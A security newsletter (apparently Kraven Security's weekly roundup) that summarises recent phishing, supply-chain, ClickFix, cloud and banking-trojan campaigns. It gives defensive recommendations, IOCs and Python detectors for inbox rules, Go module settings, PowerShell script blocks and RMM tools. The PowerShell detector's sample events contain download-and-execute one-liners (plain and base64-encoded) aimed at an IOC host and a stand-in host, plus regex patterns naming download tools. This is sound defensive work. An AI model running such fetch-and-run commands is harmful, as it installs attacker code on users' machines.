Triaging the Week 118
AiTM & Identity Hijacking Wave // Supply Chain Compromises Continue // Cloud, Web & Infrastructure Exploitation // Banking Trojans & State-Sponsored Smokescreens
Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week's top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top News Stories
Theme 1: The AiTM & Identity Hijacking Wave
Stories
🗞️ Vishing & SSO Abuse Speedrunning Data Extortion in SaaS Ecosystems – Cordial Spider and Snarky Spider are pulling off “malware-less” intrusions — legitimate auth flows + residential proxies + hidden inbox auto-delete rules to silence security alerts. Sub-1-hour data theft, no binary ever lands.
🗞️ How “AccountDumpling” Bypasses Filters to Steal 30k Accounts — noreply@appsheet.com (a Google-owned, SPF/DKIM/DMARC-clean address) is being used as a phishing relay. The lure passes every reputation check and lands in the primary inbox. 🔎 Threat Hunting Package
🗞️ Sophisticated AiTM Phishing Targeting Corporate Compliance — “Code of Conduct” review lures + preemptive authenticity statements + CAPTCHA gates that block scanners while building user trust. 35,000+ users across 13,000+ orgs hit; healthcare, finance, and tech leading the impact.
🗞️ Hackers Weaponize Google Ads to Hijack GoDaddy ManageWP Portals — Sponsored search ads with deceptive Display URLs lead to AiTM proxies that steal credentials and session tokens, neutralizing basic MFA. Web agencies running ManageWP are the high-value pivot point. One breach, dozens of client sites.
🗞️ Threat Actors Weaponize Amazon SES for Phishing & BEC — Legitimate domains routed through AWS’s high-reputation servers, valid SPF/DKIM signatures, clean infrastructure reputation. A passing SPF/DKIM/DMARC check proves only that the message left infrastructure the sending domain authorised; it says nothing about who controls that account or what the message is asking you to do.
Recommendations
☑️ Phish-resistant MFA is the floor, not the ceiling. FIDO2 / WebAuthn hardware keys for all privileged accounts. The credential is bound to the site's origin, so a proxy on a lookalike domain cannot complete the login and never gets a session to relay. They do not protect a session cookie lifted after login by an infostealer, so pair them with the token-binding and session-lifetime controls below.
☑️ Audit IdP logs for unauthorized device registrations and inbox auto-delete / forwarding rules. These are the tactics used to silence “malware-less” intrusions.
☑️ Out-of-band verification for any email-driven financial or admin request — phone or internal chat, independent of email.
☑️ Shorten session token lifetimes and bind tokens to devices via Conditional Access. Limits the window in which a stolen cookie is useful.
☑️ Move email gateways to behavioral / NLP analysis rather than reputation-based filtering. Trust the patterns, not the signing keys.
☑️ Bookmarks, not search, for sensitive admin portals, and consider org-wide ad-blocking / DNS filtering to strip sponsored results.
☑️ Update internal templates and training: “security-approved” banners, CAPTCHAs, and Code-of-Conduct emails are now attacker tactics. Compliance flows should originate only from known internal portals.
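The inbox-rule audit in the second recommendation is the one check that reliably surfaces these "malware-less" intrusions after the fact. Below is an added example of that hunt, not code from the newsletter or any vendor it cites: it scores inbox-rule audit records for the delete / external-forward / hidden-folder pattern and the alert-suppressing keywords attackers use. The records are constructed to mimic Exchange Online unified-audit-log entries for New-InboxRule / Set-InboxRule (Operation, UserId, ClientIP, Parameters as Name/Value pairs); that field layout and the internal domain list are assumptions, so map them to your own export before running it for real.

```python
"""Hunt inbox-rule audit events for the auto-delete / forward tricks that
silence security mail after an identity takeover.

Added example, not code from the newsletter or any vendor it cites. The
record shape (Operation, UserId, ClientIP, Parameters as Name/Value pairs)
and the internal domain list are assumptions about your own audit export.
"""
import re

INTERNAL_DOMAINS = {"example.com"}  # assumption: your accepted domains
# Condition wording attackers match to bury alerts, password resets and invoices
SILENCE_WORDS = re.compile(
    r"security|alert|password|sign[- ]?in|verif|suspicious|hacked|invoice|wire|payment", re.I)
# Folders used as a dumping ground so the victim never sees the message
HIDDEN_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history",
                  "junk email", "archive", "deleted items"}
RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")


def _params(record: dict) -> dict:
    """Flatten the Parameters array into {name: value}."""
    return {p["Name"]: str(p["Value"]) for p in record.get("Parameters", [])}


def score_rule(record: dict):
    """Return (score, reasons) for one audit record; 0 means nothing of note."""
    if record.get("Operation") not in RULE_OPS:
        return 0, []
    p = _params(record)
    score, reasons = 0, []
    if p.get("DeleteMessage", "").lower() == "true":
        score += 3
        reasons.append("deletes matching mail")
    for key in ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"):
        for addr in EMAIL_RE.findall(p.get(key, "")):
            if addr.rsplit("@", 1)[1].lower() not in INTERNAL_DOMAINS:
                score += 3
                reasons.append(f"{key} to external {addr}")
    folder = p.get("MoveToFolder", "").strip("\\").lower()
    if folder in HIDDEN_FOLDERS:
        score += 2
        reasons.append(f"moves mail to {folder!r}")
    if p.get("MarkAsRead", "").lower() == "true":
        score += 1
        reasons.append("marks as read")
    conditions = " ".join(p.get(k, "") for k in (
        "SubjectContainsWords", "BodyContainsWords", "SubjectOrBodyContainsWords", "From"))
    if SILENCE_WORDS.search(conditions):
        score += 2
        reasons.append("condition targets alert/finance wording")
    if len(p.get("Name", "")) <= 2:  # "." or "," rule names are a common lazy tell
        score += 1
        reasons.append("near-empty rule name")
    return score, reasons


def hunt(records, threshold: int = 4):
    """Return [(user, client_ip, score, reasons)] at or above threshold, worst first."""
    hits = []
    for r in records:
        score, reasons = score_rule(r)
        if score >= threshold:
            hits.append((r.get("UserId"), r.get("ClientIP"), score, reasons))
    return sorted(hits, key=lambda h: -h[2])


# Constructed sample records (not real log data)
SAMPLE = [
    {"Operation": "New-InboxRule", "UserId": "cfo@example.com", "ClientIP": "203.0.113.7",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "SubjectContainsWords", "Value": "security alert;password"},
                    {"Name": "DeleteMessage", "Value": "True"}, {"Name": "MarkAsRead", "Value": "True"}]},
    {"Operation": "New-InboxRule", "UserId": "ap@example.com", "ClientIP": "198.51.100.9",
     "Parameters": [{"Name": "Name", "Value": "invoices"}, {"Name": "From", "Value": "invoice@vendor.example"},
                    {"Name": "ForwardTo", "Value": "collector@mailbox.example"},
                    {"Name": "MoveToFolder", "Value": "\\RSS Subscriptions"}]},
    {"Operation": "New-InboxRule", "UserId": "dev@example.com", "ClientIP": "10.0.0.5",
     "Parameters": [{"Name": "Name", "Value": "team list"}, {"Name": "From", "Value": "list@example.com"},
                    {"Name": "MoveToFolder", "Value": "\\Lists"}]},
]

if __name__ == "__main__":
    for user, ip, score, why in hunt(SAMPLE):
        print(f"{score:>2} {user} from {ip}: {', '.join(why)}")
```

Run it against a daily export of rule-creation operations and pivot on the ClientIP: a residential-proxy address that also appears in the IdP sign-in log is the corroborating signal for the vishing-plus-SSO pattern in the first story.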
Theme 2: Supply Chain Compromise — When Trusted Code Turns Hostile
Stories
🗞️ Malicious “BufferZoneCorp” Packages Infiltrate CI/CD Pipelines — Beyond simple secret theft, fake Go wrappers and manipulated GOPROXY settings intercept future tool executions and bypass checksums. Persistence inside the build environment itself. 🔎 Threat Hunting Package
🗞️ Trellix Discloses Source Code Repository Breach — A single phished researcher gave attackers source code repo access. Even XDR vendors have human-shaped front doors.
🗞️ ScarCruft Compromises Gaming Platform in Targeted Espionage — ScarCruft owned the update mechanism of a Korean gaming platform, letting them deliver bespoke payloads only to specific victims while the general user base saw clean updates. Selective targeting at the supply chain level. 🔎 Threat Hunting Package
🗞️ Supply Chain Attack Compromises Official DAEMON Tools Software — Trojanised installers signed with the legitimate AVB Disc Soft developer cert. Valid signatures bypass perimeter trust filters; the QUIC RAT then specifically targets gov, scientific, and manufacturing orgs. 🔎 Threat Hunting Package
Recommendations
☑️ Treat third-party packages as untrusted by default. Run SCA tools that flag suspicious init() / extconf.rb / postinstall behavior before merge.
☑️ Phishing-resistant MFA on all source code repos and developer accounts — Trellix’s breach started with a phished researcher.
☑️ Automated secret scanning in CI/CD + rotation of any AWS keys, SSH keys, GitHub tokens, certs, or API keys exposed via build environments.
☑️ Verify signed binaries by behavior, not just signature. Code-signing monitoring + EDR rules for anomalous parent-child process chains and DLL sideloading from signed binaries.
☑️ Application allow-listing (WDAC / AppLocker) restricts which binaries can run at all. Note the DAEMON Tools case: a publisher rule would still admit a trojanised installer signed with the vendor's genuine certificate, so pin hash or file-version rules for installers that can reach sensitive systems.
☑️ Hunt for BufferZoneCorp / knot- prefix packages in your dependency trees, and audit endpoints running DAEMON Tools 12.5.0.2421–12.5.0.2434 (isolate, hunt traffic to env-check.daemontools[.]cc).
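The GOPROXY manipulation in the BufferZoneCorp story and the dependency hunt in the last recommendation both come down to reading two files on the build host. Below is an added example of that audit, not the newsletter's or any vendor's code: it takes the JSON that `go env -json` prints plus a go.mod and flags module-fetch settings that route fetches elsewhere or disable checksum verification, require lines whose path carries one of the flagged prefixes named above, and replace directives that swap a module for code on another host or a local path. The flagged prefixes come from the reporting; the proxy allowlist, the sample environment and the sample go.mod (including its module names) are constructed assumptions.

```python
"""Audit a Go build host for tampered module settings and flagged dependencies.

Added example, not the newsletter's or any vendor's code. Input is the output
of `go env -json` and a go.mod, both constructed inline here.
"""
import json
import re

TRUSTED_PROXIES = {"https://proxy.golang.org", "direct", "off"}  # assumption: add your internal proxy
FLAGGED_PREFIXES = ("bufferzonecorp", "knot-")  # from the reporting referenced above


def audit_env(go_env: dict) -> list:
    """Return findings for module-fetch and checksum settings in `go env -json` output."""
    findings = []
    for proxy in (p.strip() for p in re.split(r"[,|]", go_env.get("GOPROXY", ""))):
        if proxy and proxy not in TRUSTED_PROXIES:
            findings.append(f"GOPROXY routes fetches through untrusted {proxy!r}")
    sumdb = go_env.get("GOSUMDB", "sum.golang.org").strip()
    if sumdb == "off":
        findings.append("GOSUMDB=off disables checksum database verification")
    elif not sumdb.startswith("sum.golang.org"):
        findings.append(f"GOSUMDB points at non-default {sumdb!r}")
    # A bare "*" pattern exempts every module path from the checksum database
    for var in ("GONOSUMDB", "GONOSUMCHECK", "GOINSECURE", "GOPRIVATE"):
        val = go_env.get(var, "").strip()
        if val == "*" or "*/*" in val:
            findings.append(f"{var}={val!r} exempts every module from checks")
    if "-insecure" in go_env.get("GOFLAGS", ""):
        findings.append("GOFLAGS contains -insecure")
    return findings


def parse_gomod(text: str):
    """Yield (kind, fields) for require/replace lines, handling the ( ... ) block form."""
    block = None
    for raw in text.splitlines():
        line = raw.split("//")[0].strip()  # drop trailing comments such as "// indirect"
        if not line:
            continue
        if block is None:
            m = re.match(r"^(require|replace)\s*(\(?)\s*(.*)$", line)
            if not m:
                continue
            kind, opens, rest = m.groups()
            if opens:
                block = kind
            else:
                yield kind, rest.split()
        elif line == ")":
            block = None
        else:
            yield block, line.split()


def audit_gomod(text: str) -> list:
    """Flag required modules with a flagged prefix and replace directives that re-point a module."""
    findings = []
    for kind, f in parse_gomod(text):
        if kind == "require" and f:
            path = f[0]
            if any(seg.startswith(FLAGGED_PREFIXES) for seg in path.lower().split("/")):
                findings.append(f"require {path}: flagged module path")
        elif kind == "replace" and "=>" in f:
            old, new = f[0], f[f.index("=>") + 1]
            if new.startswith((".", "/")):
                findings.append(f"replace {old} => {new}: local path wrapper")
            elif new.split("/")[0] != old.split("/")[0]:
                findings.append(f"replace {old} => {new}: different host")
    return findings


# Constructed samples (not a real host; module names other than x/crypto are made up)
SAMPLE_GO_ENV = json.loads("""{
  "GOPROXY": "https://goproxy.internal.example,https://proxy.golang.org,direct",
  "GOSUMDB": "off",
  "GONOSUMDB": "",
  "GOFLAGS": "-mod=mod",
  "GOPRIVATE": ""
}""")

SAMPLE_GOMOD = """\
module example.com/app

go 1.22

require (
    github.com/BufferZoneCorp/knot-logger v1.4.2 // indirect
    golang.org/x/crypto v0.21.0
)

replace golang.org/x/crypto => github.com/someone/crypto v0.0.0-20240101000000-abcdef123456
"""

if __name__ == "__main__":
    for finding in audit_env(SAMPLE_GO_ENV) + audit_gomod(SAMPLE_GOMOD):
        print("FINDING:", finding)
```

The internal proxy in the sample is flagged on purpose: an allowlist that is not maintained is how a manipulated GOPROXY goes unnoticed, so add your own proxy explicitly and alert on anything else. Run the same audit inside CI images, not just developer laptops, since the story's persistence lives in the build environment.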
Theme 3: ClickFix & User-Driven Execution
Stories
🗞️ Venomous Helper: Dual-RMM Modern Phishing Attack — Fake browser-update lures push the victim to paste a malicious PowerShell command into their own terminal — the user becomes the installer, bypassing every browser sandbox and web filter. 🔎 Threat Hunting Package
🗞️ ClickFix Campaign Hijacks WordPress to Target Australian Infrastructure — ASD ACSC alert. Compromised Australian WordPress sites serve a fake Cloudflare verification page. Victim copies and pastes a “verification” command into Run / PowerShell and installs Vidar Stealer themselves. 🔎 Threat Hunting Package
🗞️ Fake Claude Site Spreads New Beagle Backdoor — Malvertising drives users to claude-pro[.]com, which abuses a signed G DATA antivirus updater for DLL sideloading. PlugX-style technique repackaged as a “snackable” backdoor riding the AI hype wave. 🔎 Threat Hunting Package
🗞️ Telegram “Mini Apps” Hijacked for Multi-Stage Crypto Scams — FEMITBOT impersonates NVIDIA, Apple, Disney, and BBC inside Telegram’s WebView. The “app-like” feel within a trusted platform lulls the user. No browser warnings, no sideload friction until the APK push.
Recommendations
☑️ PowerShell hardening — Constrained Language Mode + Script Block Logging (Event ID 4104) + AppLocker / WDAC on script execution from sensitive directories. Removes the runway these lures depend on. 4104 records the script text as it executes, after any -EncodedCommand decoding, so the pasted one-liner shows up in clear text even when the lure obfuscates it.
☑️ Block traffic to the named IOCs — claude-pro[.]com, 8.217.190.58, plus any “verification” / “update” domains your TI feeds surface.
☑️ Targeted user training on the “copy-paste” mechanic. Hammer the message: legitimate browser updates, Cloudflare checks, and codec installs never require running a command. If a webpage tells you to open Run or PowerShell, it’s an attack.
☑️ Software-acquisition rule of three: verified vendor domain only, ignore “sponsored” labels, check for legitimate corporate links (Privacy / About) before downloading.
☑️ No sideloaded APKs from chat platforms. Treat Telegram bot prompts to “unlock earnings” or “complete referral tasks” as advance-fee scams by default.
☑️ Brand-protection monitoring to take down fraudulent Telegram bots and Mini Apps using your branding before they reach customers.
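Script Block Logging only helps if something reads the 4104 events, and the ClickFix one-liners share a small set of tells: a download-and-execute chain, hidden-window and no-profile flags, a nested encoded command, and the "I am not a robot / Verification ID" comment the lure appends so the pasted text looks like a CAPTCHA token. Below is an added example of that detection, not the newsletter's or any vendor's code. It scores 4104 script-block text, decodes nested -EncodedCommand payloads and rescans them, and matches the IOCs listed above after refanging. The events are constructed; the field names follow the 4104 record (EventID, ScriptBlockText, Computer), and the sample hosts and URL paths are made up.

```python
"""Score PowerShell script-block (Event ID 4104) text for ClickFix-style
download-and-run patterns.

Added example, not the newsletter's or any vendor's code. Event field names
are an assumption about the 4104 record; sample events are constructed.
"""
import base64
import re

# Defanged indicators as published in the stories above; refang before matching
IOCS = ["claude-pro[.]com", "8.217.190.58"]


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".").replace("hxxp", "http")


RULES = [
    (4, "download-and-execute", re.compile(
        r"(iex|invoke-expression)[^\n]*?(iwr|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|curl |wget |start-bitstransfer)"
        r"|(iwr|invoke-webrequest|downloadstring)[^\n]*?\|\s*(iex|invoke-expression)", re.I)),
    (3, "hidden/no-profile/bypass flags", re.compile(
        r"-w(indowstyle)?\s+h(idden)?|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
    (4, "ClickFix lure marker", re.compile(r"i am not a robot|verification id|ray id|cloudflare", re.I)),
    (3, "LOLBin launcher", re.compile(
        r"\bmshta(\.exe)?\s+https?://|msiexec(\.exe)?\s+/i\s+https?://|\brundll32\b", re.I)),
    (2, "zero-width/unicode padding", re.compile(r"[\u200b\u200c\u200d\u2060]")),
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def score_script(text: str, depth: int = 0):
    """Return (score, reasons); nested encoded commands are decoded and scored recursively."""
    score, reasons = 0, []
    for weight, label, rx in RULES:
        if rx.search(text):
            score += weight
            reasons.append(label)
    lowered = text.lower()
    for ioc in IOCS:
        if refang(ioc).lower() in lowered:
            score += 5
            reasons.append(f"IOC {ioc}")
    if depth < 3:  # bound recursion for deliberately nested payloads
        for token in ENC_RE.findall(text):
            try:
                inner = base64.b64decode(token, validate=True).decode("utf-16-le", errors="ignore")
            except ValueError:
                continue
            inner_score, inner_why = score_script(inner, depth + 1)
            score += 2 + inner_score
            reasons.append("encoded command -> " + "; ".join(inner_why) if inner_why else "encoded command")
    return score, reasons


def triage(events, threshold: int = 6):
    """Return [(computer, score, reasons)] for 4104 events at or above threshold, worst first."""
    out = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        score, why = score_script(ev.get("ScriptBlockText", ""))
        if score >= threshold:
            out.append((ev.get("Computer"), score, why))
    return sorted(out, key=lambda r: -r[1])


# Constructed samples (not real telemetry); the inner payload is built here so it decodes cleanly
_INNER = "iex (New-Object Net.WebClient).DownloadString('http://claude-pro.com/update.ps1')"
_ENC = base64.b64encode(_INNER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText":
        "$u='https://verify.example/cf.txt';iex (iwr $u -UseBasicParsing).Content "
        "# \u2705 ''I am not a robot - reCAPTCHA Verification ID: 5190''"},
    {"EventID": 4104, "Computer": "WS02", "ScriptBlockText":
        "Get-ChildItem C:\\Logs -Recurse | Where-Object {$_.Length -gt 10MB}"},
    {"EventID": 4104, "Computer": "WS03", "ScriptBlockText": f"powershell -nop -w hidden -enc {_ENC}"},
    {"EventID": 4103, "Computer": "WS03", "ScriptBlockText": "iex (iwr x)"},  # not a script block; ignored
]

if __name__ == "__main__":
    for computer, score, why in triage(SAMPLE_EVENTS):
        print(f"{score:>2} {computer}: {', '.join(why)}")
```

The threshold is deliberately above any single rule so that an admin's ordinary `iwr | iex` bootstrap does not page anyone on its own; the lure marker or an IOC hit is what pushes a block over the line. Keep the IOC list fed from your TI platform rather than hard-coded.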
Theme 4: Cloud, Web & Infrastructure Exploitation
Stories
🗞️ Southeast Asian Threat Actors Weaponize cPanel Management Panels — Hijacked cPanel servers aren’t just data sources, they’re being repurposed as stealthy nodes for global phishing and C2. “Infrastructure persistence” via root-directory backdoors that survive site-level scans. 🔎 Threat Hunting Package
🗞️ New “Cloudz” Pheno Infostealer Exploits Cloud Infrastructure — “Living off the cloud” — C2 hosted on the same legitimate cloud services orgs use daily. Egress traffic appears to be normal business activity. 🔎 Threat Hunting Package
🗞️ Turf Wars in the Cloud: Worm Evicts Competitors to Monopolize Credentials — A cloud-native worm that purges rival malware (TeamPCP) before harvesting .env credentials. Automated competitive analysis, attacker-vs-attacker turf wars at scale. 🔎 Threat Hunting Package
🗞️ Palo Alto Networks Firewalls Under Active Zero-Day Exploitation — Two zero-days chained (missing auth check + command injection) take an unauthenticated internet user to root admin on the firewall in a single session. Management plane exposed to the public internet is the precondition.
🗞️ Critical Sandbox Escape: CVE-2023-29017 Threatens Node.js Environments — vm2’s Error-object handling and async-function quirks let attackers escape the sandbox to the host. The recurring CTI lesson: “perfect” software isolation gets defeated by language runtime quirks.
Recommendations
☑️ Get management planes off the public internet. cPanel (2083 / 2087), firewall mgmt interfaces, Docker socket all behind a jump box, ZTNA, or VPN with strict ACLs.
☑️ Patch on a timer for actively-exploited CVEs: PAN-OS to 11.2.4-h1 / 11.1.5-h1 / 10.2.12-h2; vm2 to 3.9.15+; run npm audit for transitive vm2 dependencies.
☑️ Stop storing long-lived secrets in .env files. Move to secret managers (AWS Secrets Manager, Vault) with short-lived IAM-role-based auth.
☑️ Phishing-resistant MFA on every management panel + IP-based ACLs restricting admin access to known networks.
☑️ Runtime cloud detection — flag unauthorized process kills, unusual scanning from inside containers, and anomalous egress to unfamiliar buckets/regions. The “malware-on-malware” signal is genuinely useful.
☑️ For high-risk untrusted code execution, move to a stronger isolation boundary (gVisor, or micro-VMs such as Firecracker) instead of relying solely on language-level sandboxes. vm2 in particular has had further escapes published since 3.9.15 and its maintainer has discontinued the project, so the upgrade is a stopgap, not a fix.
☑️ File integrity monitoring on web hosts to catch root-directory backdoors and cron-job tampering. The cPanel persistence pattern.
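The "run npm audit for transitive vm2 dependencies" step above hides a practical problem: a lockfile can carry several copies of the same package at different versions, and the vulnerable one is often nested under an intermediate dependency you never chose. Below is an added example, not the newsletter's or vm2's code, that walks the `packages` map of an npm lockfile (lockfileVersion 2 or 3; the older v1 `dependencies` tree is not handled), flags every install of vm2 below the 3.9.15 fix named above, and resolves which packages actually load each copy, following Node's nearest-`node_modules`-first rule, so you know whom to upgrade or replace. The lockfile and every package name in it other than vm2 and acorn are constructed.

```python
"""Find vulnerable copies of a package anywhere in a package-lock.json, including
nested transitive installs, and report who actually resolves to each copy.

Added example, not the newsletter's or vm2's code. The sample lockfile and
its package names (other than vm2/acorn) are constructed.
"""
import json
import re

FIXED = {"vm2": "3.9.15"}  # package -> first fixed version, from the recommendation above


def parse_version(v: str) -> tuple:
    """'3.9.14' -> (3, 9, 14); tolerates a leading 'v' and drops pre-release/build suffixes."""
    m = re.match(r"v?(\d+(?:\.\d+)*)", v.strip())
    if not m:
        raise ValueError(f"unparseable version {v!r}")
    return tuple(int(x) for x in m.group(1).split("."))


def package_name(install_path: str) -> str:
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b'; '' (root) -> ''."""
    return install_path.split("node_modules/")[-1]


def resolve(packages: dict, from_path: str, dep: str):
    """Mimic Node resolution: from_path/node_modules/dep, then each ancestor's node_modules."""
    base = from_path
    while True:
        candidate = f"{base}/node_modules/{dep}" if base else f"node_modules/{dep}"
        if candidate in packages:
            return candidate
        if not base:
            return None
        idx = base.rfind("/node_modules/")
        base = base[:idx] if idx >= 0 else ""


def dependents_by_path(packages: dict) -> dict:
    """Map each installed path to the list of package names that resolve to it."""
    out = {}
    for path, meta in packages.items():
        declared = {**meta.get("dependencies", {}), **meta.get("devDependencies", {})}
        for dep in declared:
            target = resolve(packages, path, dep)
            if target is not None:
                out.setdefault(target, []).append(package_name(path) or "<root>")
    return out


def find_vulnerable(lock: dict, fixed: dict = FIXED) -> list:
    """Return one finding per installed copy whose version is below the fixed version."""
    packages = lock.get("packages", {})
    dependents = dependents_by_path(packages)
    findings = []
    for path, meta in packages.items():
        name = package_name(path)
        if not path or name not in fixed:
            continue
        version = meta.get("version", "0")
        if parse_version(version) >= parse_version(fixed[name]):
            continue
        findings.append({"path": path, "name": name, "version": version,
                         "fixed": fixed[name], "dependents": sorted(dependents.get(path, []))})
    return findings


# Constructed lockfile: the root pins a fixed vm2, but sandbox-runner drags in a nested old copy
SAMPLE_LOCK = json.loads("""{
  "name": "app", "lockfileVersion": 3,
  "packages": {
    "": {"name": "app", "dependencies": {"sandbox-runner": "^1.0.0", "vm2": "^3.9.15"}},
    "node_modules/vm2": {"version": "3.9.15", "dependencies": {"acorn": "^8.7.0"}},
    "node_modules/sandbox-runner": {"version": "1.0.3", "dependencies": {"vm2": "3.9.14"}},
    "node_modules/sandbox-runner/node_modules/vm2": {"version": "3.9.14", "dependencies": {"acorn": "^8.7.0"}},
    "node_modules/acorn": {"version": "8.11.3"}
  }
}""")

if __name__ == "__main__":
    for f in find_vulnerable(SAMPLE_LOCK):
        print(f"{f['name']} {f['version']} (< {f['fixed']}) at {f['path']}; loaded by {f['dependents']}")
```

Point `FIXED` at whatever your advisory feed says and run this as a CI gate on the committed lockfile; a hoisted, patched copy at the top level is exactly the situation where a quick `npm ls vm2` glance gives false comfort.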
Theme 5: Targeted Operations — Banking Trojans & State-Sponsored Smokescreens
Stories
🗞️ TclBanker: The Evolution of Brazil’s Most Persistent Banking Worm — Operator-driven banking trojan with a full-screen Windows overlay that locks the victim out while the operator manually steals MFA tokens in real time. Self-propagates via WhatsApp Web and Outlook, turning each victim into the next launchpad. 🔎 Threat Hunting Package
🗞️ Iranian MuddyWater Exploits Chaos Ransomware as a Destructive Decoy — A nation-state actor hiding behind commodity Chaos ransomware “muddying tracks” so destructive activity looks like an opportunistic cybercrime hit. State-sponsored ops are increasingly mimicking criminal noise for plausible deniability. 🔎 Threat Hunting Package
Recommendations
☑️ EDR rules for unhooking and “double DLL loading” — TclBanker’s evasion path, but generally useful against Windows ETW / AMSI tampering.
☑️ Out-of-band verification for high-value transactions. If a banking session “locks” with a system-style overlay, disconnect and report, and don’t approve.
☑️ Strict RMM allow-listing. ScreenConnect, AnyDesk, and similar should be approved-list-only; any unapproved installation is a P1 alert. MuddyWater’s primary access vector.
☑️ PowerShell execution policy enforcement + EDR monitoring for encoded scripts, obfuscation, and outbound traffic to cloud file-sharing (common to both operations). Treat execution policy as a guard rail only; a single -ExecutionPolicy Bypass flag steps around it, so the EDR telemetry is the control that actually catches these loaders.
☑️ Risk-based vulnerability management on internet-facing applications and VPNs (MuddyWater’s go-to entry point).
☑️ Treat unexpected ZIPs / MSIs over WhatsApp Web and Outlook with suspicion, even from known contacts; these are TclBanker’s self-propagation channels.
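Strict RMM allow-listing, the third recommendation above, also covers the "Dual-RMM" lure in the Venomous Helper story: the tell is not just an unapproved tool but an approved tool from the wrong instance, launched by a script or browser rather than an installer, with a second RMM appearing on the same host. Below is an added example of that policy check, not the newsletter's or any vendor's code. It evaluates process-creation events against an allow-list keyed on tool family, the instance fingerprint in the install path (ScreenConnect clients install under a directory named for their instance), and the hosts each tool is approved on, then escalates any host where two RMM families show up. The events, hostnames, instance marker and policy are constructed assumptions, and the signature table is a starting set to extend with your own inventory.

```python
"""Evaluate process-creation events against an RMM allow-list and flag dual-RMM hosts.

Added example, not the newsletter's or any vendor's code. Event field names
(Computer, User, Image, ParentImage, CommandLine) follow Sysmon Event ID 1 /
Windows 4688 naming; the policy, hosts and events are constructed.
"""

# Image basename (lowercase) -> tool family. Starting set; extend from your own inventory.
RMM_SIGNATURES = {
    "screenconnect.clientservice.exe": "ScreenConnect",
    "screenconnect.windowsclient.exe": "ScreenConnect",
    "anydesk.exe": "AnyDesk",
    "teamviewer.exe": "TeamViewer",
    "ateraagent.exe": "Atera",
    "rustdesk.exe": "RustDesk",
}
# Parents that should never be spawning an RMM client (user-driven or scripted execution)
SCRIPT_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                  "winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Assumed policy: ScreenConnect from one known instance anywhere; AnyDesk only on helpdesk hosts
POLICY = {
    "ScreenConnect": {"instance_marker": "ScreenConnect Client (a1b2c3d4e5f6)", "hosts": None},
    "AnyDesk": {"instance_marker": None, "hosts": {"HD01", "HD02"}},
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict, policy: dict = POLICY):
    """Return an alert dict for a policy violation, or None for non-RMM or approved activity."""
    tool = RMM_SIGNATURES.get(basename(event["Image"]))
    if tool is None:
        return None
    reasons, severity = [], None
    rule = policy.get(tool)
    if rule is None:
        reasons.append(f"{tool} is not an approved RMM tool")
        severity = "P1"
    else:
        if rule["hosts"] is not None and event["Computer"] not in rule["hosts"]:
            reasons.append(f"{tool} not approved on {event['Computer']}")
            severity = "P1"
        marker = rule["instance_marker"]
        haystack = (event["Image"] + " " + event.get("CommandLine", "")).lower()
        if marker and marker.lower() not in haystack:
            reasons.append(f"{tool} binary is not from the approved instance")
            severity = "P1"
    parent = basename(event.get("ParentImage", ""))
    if parent in SCRIPT_PARENTS:
        reasons.append(f"launched by {parent}")
        severity = severity or "P2"
    if not reasons:
        return None
    return {"Computer": event["Computer"], "User": event.get("User"), "tool": tool,
            "severity": severity, "reasons": reasons}


def evaluate(events, policy: dict = POLICY) -> list:
    """Classify every event, then escalate alerts on hosts running more than one RMM family."""
    alerts = [a for a in (classify(e, policy) for e in events) if a]
    families = {}
    for e in events:
        tool = RMM_SIGNATURES.get(basename(e["Image"]))
        if tool:
            families.setdefault(e["Computer"], set()).add(tool)
    for a in alerts:
        seen = families[a["Computer"]]
        if len(seen) > 1:
            a["severity"] = "P1"
            a["reasons"].append("dual-RMM on host: " + ", ".join(sorted(seen)))
    return alerts


SAMPLE_EVENTS = [  # constructed process-creation records, not real telemetry
    {"Computer": "WS01", "User": "CORP\\jdoe", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4e5f6)\ScreenConnect.ClientService.exe"},
    {"Computer": "WS02", "User": "CORP\\asmith",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\asmith\AppData\Local\Temp\ScreenConnect Client (ffffffffffff)\ScreenConnect.WindowsClient.exe"},
    {"Computer": "WS02", "User": "CORP\\asmith",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\asmith\AppData\Local\Temp\AnyDesk.exe"},
    {"Computer": "HD01", "User": "CORP\\helpdesk1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"},
    {"Computer": "WS03", "User": "CORP\\bwu", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\bwu\Downloads\TeamViewer.exe"},
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"{a['severity']} {a['Computer']} {a['tool']}: {'; '.join(a['reasons'])}")
```

The instance-marker check is the part worth keeping even if you discard the rest: an attacker running their own ScreenConnect server produces a binary that is validly signed and has the same name as yours, and only the instance fingerprint tells the two apart.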
Feature Video
You’ve spent £400 on a cert. Three months studying for it. Then the hiring manager has never heard of it. 😬
This happens way too often to people trying to break into Cyber Threat Intelligence. The fix isn’t more effort; it’s a better order.
